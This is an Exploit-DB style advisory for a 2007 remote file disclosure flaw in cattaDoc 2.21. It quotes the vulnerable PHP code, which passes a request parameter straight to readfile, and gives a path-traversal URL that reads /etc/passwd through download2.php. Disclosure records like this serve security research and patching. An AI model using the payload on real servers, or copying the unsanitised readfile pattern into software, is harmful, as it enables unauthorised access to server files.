cattaDoc 2.21(download2.php fn1) Remote File Disclosure Vulnerability

vendor:

cattaDoc

by:

GolD_M = [Mahmood_ali]

N/A

CVSS

MEDIUM

Remote File Disclosure

CWE

Product Name: cattaDoc

Affected Version From: 2.21

Affected Version To: 2.21

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

cattaDoc 2.21(download2.php fn1) Remote File Disclosure Vulnerability

The cattaDoc 2.21 version is vulnerable to a remote file disclosure vulnerability. The exploit allows an attacker to disclose files from the server by exploiting the 'download2.php' script. By manipulating the 'fn1' parameter in the URL, an attacker can traverse the directory structure and access sensitive files such as the '/etc/passwd' file.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of cattaDoc or apply any available security patches. Additionally, access control measures should be implemented to restrict unauthorized access to sensitive files.

Source

Exploit-DB raw data:

# cattaDoc 2.21(download2.php fn1)Remote File Disclosure Vulnerability
# D.Script: http://cattadoc.com/download/cattadoc-2.21.tgz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code: 
##############################################################
# $tp = $_REQUEST['mtp'];                                    # 
# $ofn = '"'.$_REQUEST['fn2'].'"';                           # 
# header("Content-type: $tp");                               #
# header("Content-Disposition: attachment; filename=$ofn");  #
# readfile($_REQUEST['fn1']); <<----                         #
##############################################################
# Exploit:[Path_cattaDoc]/download2.php?fn1=../../../../../../etc/passwd

# milw0rm.com [2007-04-06]